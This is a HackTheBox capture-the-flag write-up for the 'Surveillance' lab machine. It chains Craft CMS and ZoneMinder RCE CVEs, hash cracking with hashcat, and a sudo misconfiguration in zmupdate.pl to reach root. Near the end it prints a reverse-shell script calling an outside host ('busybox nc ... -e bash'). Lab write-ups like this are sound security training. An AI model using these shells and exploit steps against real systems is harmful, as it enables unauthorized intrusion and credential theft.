HackTheBox — Surveillance Writeup

Gerardo Torres
9 min read · Mar 17, 2024


Here is the writeup for another HackTheBox machine; this time, we have “Surveillance” created by TheCyberGeek & TRX.

Enumeration

Let’s start by conducting an Nmap scan, using the following parameters: -sV for version enumeration, -sC for default scripts, -p- to scan all ports, -T4 to speed up the scan, and -oN to save the results to the file nmap.txt.

# Nmap 7.80 scan initiated Wed Mar  6 10:25:27 2024 as: nmap -sVC -p- -T4 -oN nmap.txt 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 6 10:25:53 2024 -- 1 IP address (1 host up) scanned in 26.25 seconds

The Nmap scan reveals two open TCP ports: port 22, running OpenSSH, and port 80, hosting an nginx web server that redirects to http://surveillance.htb/. We need to add surveillance.htb to our /etc/hosts file, so let’s do that first.

80 — HTTP

Navigating to the website at http://surveillance.htb/, we find the home page.

The website indicates that it is powered by Craft CMS, a PHP content management system built on the Yii 2 framework that offers content modeling and organizational tools for web projects.

First, let’s check whether there is a robots.txt file that might give us some information. The robots.txt file tells web crawlers which parts of the site they should not index, and it sometimes lists paths the site owner would rather keep quiet.

However, it appears that there is no such file. So, let’s examine the source code to see if there’s anything of interest there.

After a quick look through the page source, we find that the site is running Craft CMS version 4.4.14. With the version in hand, let’s check whether there are any known vulnerabilities we could exploit.

CVE-2023–41892

Great, there is an unauthenticated remote code execution (RCE) vulnerability affecting Craft CMS versions 4.0.0-RC1 through 4.4.14 (fixed in 4.4.15), so our version is in range.

The root cause is an unauthenticated PHP object injection: the conditions/render controller action accepts an attacker-supplied object configuration and passes it through Yii’s object factory, so arbitrary classes can be instantiated with attacker-controlled properties. The public exploit uses this to call arbitrary PHP functions and then abuses Imagick’s MSL coder to write a PHP web shell into the web root.

If you are interested in learning more about how this exploit works, I found the article above helpful for getting a better understanding of it.

Now, onto the exploitation. We just need to run the Python script from the GitHub repository and pass it the URL http://surveillance.htb/. This gives us command execution as the www-data user, though it appears to be a web shell operating out of the /var/www/html/craft/web directory rather than an interactive shell.

We know that the website supports PHP files, so let’s test whether we can execute our own PHP files.

First, I created a super simple test.php file and ran it from the browser.

And it worked! So let’s upload a reverse shell from revshells.com. I’ll be using the PHP PentestMonkey payload with bash as the shell, as I have found it to be pretty reliable.

Now let’s set up a Netcat listener and visit http://surveillance.htb/rev.php.

Once the connection comes back, let’s upgrade the shell to a fully interactive TTY using the following commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

stty raw -echo; fg

reset

# If it asks what type of shell say
xterm-256color

export TERM=xterm-256color
export SHELL=bash

www-data PrivEsc

After upgrading the shell, I first looked at the .env file, which holds the application’s environment variables and can sometimes provide useful information.

We discover some potential MySQL database credentials: craftuser:CraftCMSPassword2023!.

I attempted to access the MySQL database.

And we gained access! Within the craftdb database, we find a users table containing admin credentials.

Let’s determine the type of hash used.

We identify it as bcrypt ($2*$), which hashcat lists as “bcrypt $2*$, Blowfish (Unix)”. I then attempted to crack it with hashcat using mode -m 3200, a straight wordlist attack (-a 0), and the rockyou password list.

hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt

Bcrypt is deliberately slow, so this was taking much longer than usual, and I suspected it might not yield anything. While it was still running, I continued enumerating and discovered a backup folder containing an .sql.zip file.

After unzipping the file and pulling the users table out of the dump, we find a second hash for the admin account, which belongs to the user matthew.

Using hashes.com again, we determine the type of hash used.

It appears to be a SHA-256 hash (64 hexadecimal characters). Unlike bcrypt, this is a fast, unsalted hash, so a wordlist attack should be quick. Let’s crack it using the same syntax as before but with mode -m 1400, which corresponds to raw SHA-256.

hashcat -m 1400 -a 0 hash /usr/share/wordlists/rockyou.txt

And there we go! In only 3 seconds, we have a potential password for the user matthew.
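The difference between the two cracking attempts above comes down to recognising the hash format and picking the right hashcat mode. The following Python is an added example written for this writeup (it is not the author’s tooling or hashcat code): it guesses the format from the hash’s shape the way hashes.com does, reads the bcrypt work factor that makes the first hash so slow, and runs a plain dictionary attack against an unsalted SHA-256 digest. The sample hash, wordlist and plaintext are constructed for the demo and are not values from the target.

```python
import hashlib
import re

# hashcat -m values for the formats this writeup meets, plus two common extras.
HASHCAT_MODES = {"bcrypt": 3200, "SHA-256": 1400, "SHA-1": 100, "MD5": 0}

# $2a$/$2b$/$2x$/$2y$, two-digit cost, then 22 salt + 31 hash chars (53 total).
BCRYPT_RE = re.compile(r"\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}")


def identify_hash(h):
    """Guess the hash format from its shape and return (name, hashcat mode).

    Hex digests are classified by length only, so a 64-hex-character value is
    reported as SHA-256 even though SHA3-256 or BLAKE2s-256 look identical;
    confirm with a known plaintext before spending GPU time on it.
    """
    h = h.strip()
    if BCRYPT_RE.fullmatch(h):
        return "bcrypt", HASHCAT_MODES["bcrypt"]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        by_len = {64: "SHA-256", 40: "SHA-1", 32: "MD5"}
        name = by_len.get(len(h))
        return (name, HASHCAT_MODES[name]) if name else ("unknown", None)
    return "unknown", None


def bcrypt_cost(h):
    """Work factor embedded in a bcrypt hash; each +1 doubles the cost of every guess."""
    m = BCRYPT_RE.fullmatch(h.strip())
    return int(m.group(1)) if m else None


def crack_sha256(target_hex, wordlist):
    """Straight dictionary attack (hashcat -a 0 equivalent) against unsalted SHA-256."""
    target = target_hex.strip().lower()
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target:
            return word
    return None


# Constructed sample data for the demo (not hashes or passwords from the target).
SAMPLE_BCRYPT = "$2y$13$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"
SAMPLE_WORDLIST = ["123456", "password", "letmein", "summer2023", "qwerty"]
SAMPLE_SHA256 = hashlib.sha256(b"summer2023").hexdigest()

if __name__ == "__main__":
    for sample in (SAMPLE_BCRYPT, SAMPLE_SHA256):
        name, mode = identify_hash(sample)
        print(f"{sample[:20]}... -> {name} (hashcat -m {mode})")
    print("bcrypt cost factor:", bcrypt_cost(SAMPLE_BCRYPT))
    print("SHA-256 dictionary hit:", crack_sha256(SAMPLE_SHA256, SAMPLE_WORDLIST))
```

A bcrypt hash with cost 13 requires 2^13 Blowfish key-setup rounds per guess, which is why the first hashcat run crawled through rockyou while the unsalted SHA-256 hash fell in three seconds.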

matthew PrivEsc

Let’s use the password we found to connect as matthew over SSH.

We also retrieve the user.txt file, giving us the first flag.

I checked for sudo privileges, but we have none.

Similarly, when looking for files with SUID permissions, I found none that stood out. I also examined the kernel version and cronjobs, but there was nothing exploitable that I could identify. Let’s proceed to run LinPEAS.

The first thing that caught my attention was a set of configuration files for ZoneMinder.

Going down a bit more, I found database credentials for the ZoneMinder service.

In one of the configuration files that LinPEAS showed us, we can see the service is listening locally on 127.0.0.1:8080. So, let’s set up SSH local port forwarding, mapping a local port (I used 1337) to the target’s 127.0.0.1:8080.

127.0.0.1:8080 — HTTP

Browsing to http://127.0.0.1:1337 through the forwarded port, we find the ZoneMinder web interface.

I attempted to use some default credentials like admin:admin and I also tried zoneminder:ZoneMinderPassword2023, but unfortunately, I had no luck. Conducting further enumeration on the website did not reveal anything of interest. Let’s proceed to see if we find a version number or any other useful information in the configuration files.

Going to /usr/share/zoneminder/www/api/app/Config, we find the version number. Let’s search to see if this version is vulnerable.

CVE-2023–26035

We discover that this version of ZoneMinder is vulnerable to unauthenticated remote code execution (RCE). Let’s start by testing whether it works by having the target send ICMP echo requests to our machine.

The command is executed correctly.

Using tcpdump on the tun0 interface, we see the ICMP echo requests arriving from the target. Now it’s time to send a reverse shell.

Listening on port 8888 with Netcat, we receive a connection back as the zoneminder user. I also upgraded the shell using the same commands as before.

zoneminder PrivEsc

I first checked for sudo privileges.

We can run /usr/bin/zm[a-zA-Z]*.pl * with sudo privileges. The glob in the path covers every ZoneMinder Perl script in /usr/bin whose name starts with zm, and the trailing * means any arguments are accepted, so we can execute any of the following Perl scripts as root with arguments of our choosing:

After some research, I found that you are able to run commands by abusing the zmupdate.pl script.

However, this didn’t work. After some further searching, I came across a similar technique that also uses zmupdate.pl, but with a different argument syntax.

The only problem is that we don’t see the output of the commands we run. Therefore, I copy the root.txt file into the /tmp directory and make it readable.
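The sudo rule above is what makes the zmupdate.pl trick possible: the path pattern matches every zm*.pl script and the trailing * accepts any argument string. The following Python is an added example written for this writeup (not sudo’s code and not the author’s tooling) that approximates how sudoers matches a command specification, so you can check what a rule actually permits before relying on it or signing off on it. It follows sudo’s documented behaviour: the command path is matched with FNM_PATHNAME semantics (wildcards do not cross /), a rule with no arguments allows any arguments, an explicit "" allows none, and otherwise the user’s arguments are joined by spaces and glob-matched. RULE_FROM_BOX is the rule shown by sudo -l on the target; RULE_FIXED is a constructed tighter rule for comparison.

```python
import re

RULE_FROM_BOX = "/usr/bin/zm[a-zA-Z]*.pl *"        # as reported by sudo -l on the target
RULE_FIXED = "/usr/bin/zmupdate.pl --version=1"     # constructed: one script, fixed arguments


def _glob_to_regex(pattern, pathname):
    """Translate a sudoers glob into a regex. With pathname=True, * and ? stop at '/'."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "*":
            out.append("[^/]*" if pathname else ".*")
        elif c == "?":
            out.append("[^/]" if pathname else ".")
        elif c == "[":
            j = pattern.find("]", i + 1)
            if j == -1:
                out.append(re.escape(c))
            else:
                body = pattern[i + 1:j]
                if body.startswith("!"):            # [!abc] negates, like fnmatch
                    body = "^" + body[1:]
                out.append("[" + body + "]")
                i = j
        else:
            out.append(re.escape(c))
        i += 1
    return re.compile("".join(out) + r"\Z")


def sudo_rule_matches(rule, command_line):
    """Return True if sudo would accept command_line under the sudoers command spec `rule`.

    Approximation of sudo's matching for illustration; the real implementation also
    considers digests, path canonicalisation and other sudoers options.
    """
    rule_path, _, rule_args = rule.strip().partition(" ")
    cmd_path, _, cmd_args = command_line.strip().partition(" ")
    if not _glob_to_regex(rule_path, pathname=True).match(cmd_path):
        return False
    if rule_args == "":
        return True                  # no args in the rule: sudo permits any arguments
    if rule_args == '""':
        return cmd_args == ""        # explicit "" in the rule: no arguments allowed
    return _glob_to_regex(rule_args, pathname=False).match(cmd_args) is not None


def permitted_by(rule, candidates):
    """Filter a list of command lines down to those the rule would allow."""
    return [c for c in candidates if sudo_rule_matches(rule, c)]


# Constructed command lines to evaluate against the two rules.
CANDIDATES = [
    "/usr/bin/zmupdate.pl --version=1",
    "/usr/bin/zmupdate.pl --version=1 --user=attacker-controlled --pass=x",
    "/usr/bin/zmpkg.pl start",
    "/usr/bin/zmdir/../bash.pl -c id",   # path traversal: wildcard must not cross '/'
    "/bin/bash -p",
]

if __name__ == "__main__":
    for rule in (RULE_FROM_BOX, RULE_FIXED):
        print(f"{rule}:")
        for c in CANDIDATES:
            print(f"  {'ALLOW' if sudo_rule_matches(rule, c) else 'deny '}  {c}")
```

Running it shows that the box’s rule accepts every zm*.pl script with arbitrary arguments, which is exactly the surface zmupdate.pl’s argument handling needs, while a rule pinned to one script and one fixed argument string rejects everything else.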

And with this, we obtain the root flag root.txt.

However, it’s no fun if we don’t manage to become root, so let’s give it a try.

root

For this, let’s return to revshells.com.

#!/bin/bash
busybox nc 10.10.14.146 7777 -e bash

I created this reverse shell script on my local machine and used a Python web server along with wget to transfer the file. Then, I made it executable by changing its permissions.

And we became root!

You can probably achieve root access using various methods such as changing root’s password or setting the SUID bit on a binary that allows privilege escalation, among others. However, I opted to do it this way.

If after reading the writeup you have any feedback regarding the article or suggestions for improving my methodology in tackling this machine, please feel free to leave a comment on the article or reach out to me directly. I constantly strive to enhance my skills and learn new techniques, so your input is highly valued. Thanks for the support!
